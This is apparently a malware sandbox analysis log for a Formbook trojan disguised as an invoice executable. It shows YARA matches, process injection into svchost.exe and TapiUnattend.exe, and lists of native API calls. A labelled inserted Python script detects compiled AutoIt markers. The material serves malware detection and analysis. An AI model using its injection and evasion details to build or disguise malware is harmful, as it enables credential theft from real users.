            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4149796746.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4149856590.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2117687090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4150699714.0000000002570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4149551530.00000000028E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2118026660.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4150549424.00000000039C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2118406683.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: PROFOMA INVOICE SHEET.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: PROFOMA INVOICE SHEET.exe, 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_f524b93f-b
            Source: PROFOMA INVOICE SHEET.exe, 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_55c5c27b-7
            Source: PROFOMA INVOICE SHEET.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_0612b9e1-a
            Source: PROFOMA INVOICE SHEET.exe | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_af47f462-9
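The notice string above is carried by the AutoIt3 runtime stub that every compiled script is wrapped in, and the embedded script itself starts with the "AU3!EA06" signature. As an added example (not from the report), the check below looks for both markers in a file, with the notice searched in both ASCII and UTF-16LE since the stub stores its strings as wide characters; the sample blob is constructed padding with the two markers planted in it, not the real sample.

```python
"""Static triage check for a compiled AutoIt3 executable.

Added example, not part of the report. It looks for two markers of the AutoIt3
stub: the notice string that the report found in the sample's memory, and the
'AU3!EA06' signature at the start of the embedded script.
"""
AUTOIT_NOTICE = "This is a third-party compiled AutoIt script."
AU3_MAGIC = b"AU3!EA06"


def autoit_indicators(data):
    """Return the offset of each marker in data (-1 when absent) and a verdict."""
    hits = {
        "notice_ascii": data.find(AUTOIT_NOTICE.encode("ascii")),
        "notice_utf16": data.find(AUTOIT_NOTICE.encode("utf-16-le")),
        "au3_magic": data.find(AU3_MAGIC),
    }
    hits["compiled_autoit"] = any(off != -1 for off in hits.values())
    return hits


def scan_file(path):
    """Run the check on a file on disk."""
    with open(path, "rb") as fh:
        return autoit_indicators(fh.read())


# Constructed sample: not a real PE, just a DOS/PE magic, padding, the notice in
# UTF-16LE at offset 168 and the AU3 signature 16 bytes after it (offset 274).
SAMPLE_BLOB = (b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x00" * 100
               + AUTOIT_NOTICE.encode("utf-16-le") + b"\x00" * 16
               + AU3_MAGIC + b"\x00" * 32)


if __name__ == "__main__":
    import sys
    target = scan_file(sys.argv[1]) if len(sys.argv) > 1 else autoit_indicators(SAMPLE_BLOB)
    for name, value in target.items():
        print(f"{name}: {value}")
```

Pass a path on the command line to scan a real file; with no argument it runs on the constructed blob. A hit on the AU3 signature is the stronger of the two, since the notice string can survive in unrelated binaries that embed the AutoIt runtime, while the signature marks the actual script payload.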
            Source: initial sample | Static PE information: Filename: PROFOMA INVOICE SHEET.exe
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042C683 NtClose,1_2_0042C683
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72B60 NtClose,LdrInitializeThunk,1_2_03C72B60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03C72DF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03C72C70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C735C0 NtCreateMutant,LdrInitializeThunk,1_2_03C735C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C74340 NtSetContextThread,1_2_03C74340
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C74650 NtSuspendThread,1_2_03C74650
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72BE0 NtQueryValueKey,1_2_03C72BE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72BF0 NtAllocateVirtualMemory,1_2_03C72BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72B80 NtQueryInformationFile,1_2_03C72B80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72BA0 NtEnumerateValueKey,1_2_03C72BA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72AD0 NtReadFile,1_2_03C72AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72AF0 NtWriteFile,1_2_03C72AF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72AB0 NtWaitForSingleObject,1_2_03C72AB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72FE0 NtCreateFile,1_2_03C72FE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72F90 NtProtectVirtualMemory,1_2_03C72F90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72FA0 NtQuerySection,1_2_03C72FA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72FB0 NtResumeThread,1_2_03C72FB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72F60 NtCreateProcessEx,1_2_03C72F60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72F30 NtCreateSection,1_2_03C72F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72EE0 NtQueueApcThread,1_2_03C72EE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72E80 NtReadVirtualMemory,1_2_03C72E80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72EA0 NtAdjustPrivilegesToken,1_2_03C72EA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72E30 NtWriteVirtualMemory,1_2_03C72E30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72DD0 NtDelayExecution,1_2_03C72DD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72DB0 NtEnumerateKey,1_2_03C72DB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72D00 NtSetInformationFile,1_2_03C72D00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72D10 NtMapViewOfSection,1_2_03C72D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72D30 NtUnmapViewOfSection,1_2_03C72D30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72CC0 NtQueryVirtualMemory,1_2_03C72CC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72CF0 NtOpenProcess,1_2_03C72CF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72CA0 NtQueryInformationToken,1_2_03C72CA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72C60 NtCreateKey,1_2_03C72C60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72C00 NtQueryInformationProcess,1_2_03C72C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C73090 NtSetValueKey,1_2_03C73090
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C73010 NtOpenDirectoryObject,1_2_03C73010
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C739B0 NtGetContextThread,1_2_03C739B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C73D70 NtOpenThread,1_2_03C73D70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C73D10 NtOpenProcessToken,1_2_03C73D10
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03354340 NtSetContextThread,LdrInitializeThunk,6_2_03354340
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03354650 NtSuspendThread,LdrInitializeThunk,6_2_03354650
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352B60 NtClose,LdrInitializeThunk,6_2_03352B60
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03352BA0
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03352BF0
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03352BE0
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352AF0 NtWriteFile,LdrInitializeThunk,6_2_03352AF0
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352AD0 NtReadFile,LdrInitializeThunk,6_2_03352AD0
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352F30 NtCreateSection,LdrInitializeThunk,6_2_03352F30
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352FB0 NtResumeThread,LdrInitializeThunk,6_2_03352FB0
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352FE0 NtCreateFile,LdrInitializeThunk,6_2_03352FE0
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03352E80
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03352EE0
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03352D30
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03352D10
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03352DF0
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352DD0 NtDelayExecution,LdrInitializeThunk,6_2_03352DD0
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03352C70
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352C60 NtCreateKey,LdrInitializeThunk,6_2_03352C60
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03352CA0
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_033535C0 NtCreateMutant,LdrInitializeThunk,6_2_033535C0
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_033539B0 NtGetContextThread,LdrInitializeThunk,6_2_033539B0
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352B80 NtQueryInformationFile,6_2_03352B80
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352AB0 NtWaitForSingleObject,6_2_03352AB0
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352F60 NtCreateProcessEx,6_2_03352F60
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352FA0 NtQuerySection,6_2_03352FA0
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352F90 NtProtectVirtualMemory,6_2_03352F90
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352E30 NtWriteVirtualMemory,6_2_03352E30
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352EA0 NtAdjustPrivilegesToken,6_2_03352EA0
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352D00 NtSetInformationFile,6_2_03352D00
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352DB0 NtEnumerateKey,6_2_03352DB0
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352C00 NtQueryInformationProcess,6_2_03352C00
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352CF0 NtOpenProcess,6_2_03352CF0
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03352CC0 NtQueryVirtualMemory,6_2_03352CC0
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03353010 NtOpenDirectoryObject,6_2_03353010
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03353090 NtSetValueKey,6_2_03353090
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03353D10 NtOpenProcessToken,6_2_03353D10
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_03353D70 NtOpenThread,6_2_03353D70
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_029092A0 NtReadFile,6_2_029092A0
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_029093A0 NtDeleteFile,6_2_029093A0
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_02909130 NtCreateFile,6_2_02909130
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_02909440 NtClose,6_2_02909440
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_029095A0 NtAllocateVirtualMemory,6_2_029095A0
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_0036D5EB CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_00361201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_0036E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code functions (listed by id only):
  0_2_0030BF40, 0_2_00308060, 0_2_00372046, 0_2_00368298, 0_2_0033E4FF, 0_2_0033676B, 0_2_00394873,
  0_2_0032CAA0, 0_2_0030CAF0, 0_2_0031CC39, 0_2_00336DD9, 0_2_0031D064, 0_2_0031B119, 0_2_003091C0,
  0_2_00321394, 0_2_00321706, 0_2_0032781B, 0_2_00307920, 0_2_0031997D, 0_2_003219B0, 0_2_00327A4A,
  0_2_00321C77, 0_2_00327CA7, 0_2_00353CD2, 0_2_0038BE44, 0_2_00339EEE, 0_2_00321F32, 0_2_03DBCA80
Source: C:\Windows\SysWOW64\svchost.exe | Code functions (listed by id only):
  1_2_004185D3, 1_2_00410033, 1_2_0040E0B3, 1_2_004011B0, 1_2_004022B0, 1_2_0042ECD3, 1_2_004025C0, 1_2_0040FE13,
  1_2_004167C3, 1_2_00402FA0, 1_2_004167BE, 1_2_03C4E3F0, 1_2_03D003E6, 1_2_03CFA352, 1_2_03CC02C0, 1_2_03CE0274,
  1_2_03CF81CC, 1_2_03CF41A2, 1_2_03D001AA, 1_2_03CC8158, 1_2_03C30100, 1_2_03CDA118, 1_2_03CD2000, 1_2_03C3C7C0,
  1_2_03C64750, 1_2_03C40770, 1_2_03C5C6E0, 1_2_03D00591, 1_2_03C40535, 1_2_03CEE4F6, 1_2_03CF2446, 1_2_03CE4420,
  1_2_03CF6BD7, 1_2_03CFAB40, 1_2_03C3EA80, 1_2_03C429A0, 1_2_03D0A9A6, 1_2_03C56962, 1_2_03C6E8F0, 1_2_03C268B8,
  1_2_03C4A840, 1_2_03C42840, 1_2_03C32FC8, 1_2_03CBEFA0, 1_2_03CB4F40, 1_2_03C82F28, 1_2_03C60F30, 1_2_03CE2F30,
  1_2_03CFEEDB, 1_2_03C52E90, 1_2_03CFCE93, 1_2_03C40E59, 1_2_03CFEE26, 1_2_03C3ADE0, 1_2_03C58DBF, 1_2_03C4AD00,
  1_2_03CDCD1F, 1_2_03C30CF2, 1_2_03CE0CB5, 1_2_03C40C00, 1_2_03C8739A, 1_2_03C2D34C, 1_2_03CF132D, 1_2_03C5B2C0,
  1_2_03CE12ED, 1_2_03C5D2F0, 1_2_03C452A0, 1_2_03C4B1B0, 1_2_03C7516C, 1_2_03C2F172, 1_2_03D0B16B, 1_2_03CEF0CC,
  1_2_03C470C0, 1_2_03CF70E9, 1_2_03CFF0E0, 1_2_03CFF7B0, 1_2_03CF16CC, 1_2_03CDD5B0, 1_2_03CF7571, 1_2_03C31460,
  1_2_03CFF43F, 1_2_03CB5BF0, 1_2_03C7DBF9, 1_2_03C5FB80, 1_2_03CFFB76, 1_2_03CEDAC6, 1_2_03CDDAAC, 1_2_03C85AA0,
  1_2_03CE1AA3, 1_2_03CFFA49, 1_2_03CF7A46, 1_2_03CB3A6C, 1_2_03C49950, 1_2_03C5B950, 1_2_03CD5910, 1_2_03C438E0,
  1_2_03CAD800, 1_2_03C41F92, 1_2_03CFFFB1, 1_2_03CFFF09, 1_2_03C49EB0, 1_2_03C5FDC0, 1_2_03C43D40, 1_2_03CF1D5A,
  1_2_03CF7D73, 1_2_03CFFCF2, 1_2_03CB9C32
Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code functions (listed by id only):
  6_2_033DA352, 6_2_0332E3F0, 6_2_033E03E6, 6_2_033C0274, 6_2_033A02C0, 6_2_033BA118, 6_2_03310100, 6_2_033A8158,
  6_2_033E01AA, 6_2_033D41A2, 6_2_033D81CC, 6_2_033B2000, 6_2_03320770, 6_2_03344750, 6_2_0331C7C0, 6_2_0333C6E0,
  6_2_03320535, 6_2_033E0591, 6_2_033C4420, 6_2_033D2446, 6_2_033CE4F6, 6_2_033DAB40, 6_2_033D6BD7, 6_2_0331EA80,
  6_2_03336962, 6_2_033229A0, 6_2_033EA9A6, 6_2_03322840, 6_2_0332A840, 6_2_033068B8, 6_2_0334E8F0, 6_2_03340F30,
  6_2_033C2F30, 6_2_03362F28, 6_2_03394F40, 6_2_0339EFA0, 6_2_03312FC8, 6_2_033DEE26, 6_2_03320E59, 6_2_03332E90,
  6_2_033DCE93, 6_2_033DEEDB, 6_2_033BCD1F, 6_2_0332AD00, 6_2_03338DBF, 6_2_0331ADE0, 6_2_03320C00, 6_2_033C0CB5,
  6_2_03310CF2, 6_2_033D132D, 6_2_0330D34C, 6_2_0336739A, 6_2_033252A0, 6_2_0333D2F0, 6_2_033C12ED, 6_2_0333B2C0,
  6_2_0330F172, 6_2_033EB16B, 6_2_0335516C, 6_2_0332B1B0, 6_2_033D70E9, 6_2_033DF0E0, 6_2_033CF0CC, 6_2_033270C0,
  6_2_033DF7B0, 6_2_03365630, 6_2_033D16CC, 6_2_033D7571, 6_2_033BD5B0, 6_2_033DF43F, 6_2_03311460, 6_2_033DFB76,
  6_2_0333FB80, 6_2_03395BF0, 6_2_0335DBF9, 6_2_03393A6C, 6_2_033DFA49, 6_2_033D7A46, 6_2_03365AA0, 6_2_033BDAAC,
  6_2_033C1AA3, 6_2_033CDAC6, 6_2_033B5910, 6_2_03329950, 6_2_0333B950, 6_2_0338D800, 6_2_033238E0, 6_2_033DFF09,
  6_2_033DFFB1, 6_2_03321F92, 6_2_03329EB0, 6_2_033D7D73, 6_2_033D1D5A, 6_2_03323D40, 6_2_0333FDC0, 6_2_03399C32,
  6_2_033DFCF2, 6_2_028F1CD0, 6_2_028ECBD0, 6_2_028EAE70, 6_2_028ECDF0, 6_2_028F5390, 6_2_028F3580, 6_2_028F357B,
  6_2_0290BA90, 6_2_0311E336, 6_2_0311E7ED, 6_2_0311E453, 6_2_0311CA6F, 6_2_0311CAE8, 6_2_0311D823, 6_2_0311D858
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C75130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C2B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C87E54 appears 99 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03CAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03CBF290 appears 103 times
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: String function: 00320A30 appears 46 times
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: String function: 0031F9F2 appears 31 times
Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: String function: 0330B970 appears 262 times
Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: String function: 0338EA12 appears 85 times
Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: String function: 03355130 appears 58 times
Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: String function: 03367E54 appears 107 times
Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: String function: 0339F290 appears 103 times
Source: PROFOMA INVOICE SHEET.exe, 00000000.00000003.1700161234.0000000003B33000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilename ntdll.dllj% vs PROFOMA INVOICE SHEET.exe
Source: PROFOMA INVOICE SHEET.exe, 00000000.00000003.1702033094.000000000489D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilename ntdll.dllj% vs PROFOMA INVOICE SHEET.exe
Source: PROFOMA INVOICE SHEET.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23), matched in:
  Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
  Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
  Source: 00000006.00000002.4149796746.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
  Source: 00000006.00000002.4149856590.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
  Source: 00000001.00000002.2117687090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
  Source: 00000007.00000002.4150699714.0000000002570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
  Source: 00000006.00000002.4149551530.00000000028E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
  Source: 00000001.00000002.2118026660.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
  Source: 00000005.00000002.4150549424.00000000039C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
  Source: 00000001.00000002.2118406683.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@14/7
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_003737B5 GetLastError,FormatMessageW | 0_2_003737B5
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_003610BF AdjustTokenPrivileges,CloseHandle | 0_2_003610BF
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_003616C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError | 0_2_003616C3
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_003751CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode | 0_2_003751CD
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_0038A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle | 0_2_0038A67C
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_0037648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize | 0_2_0037648E
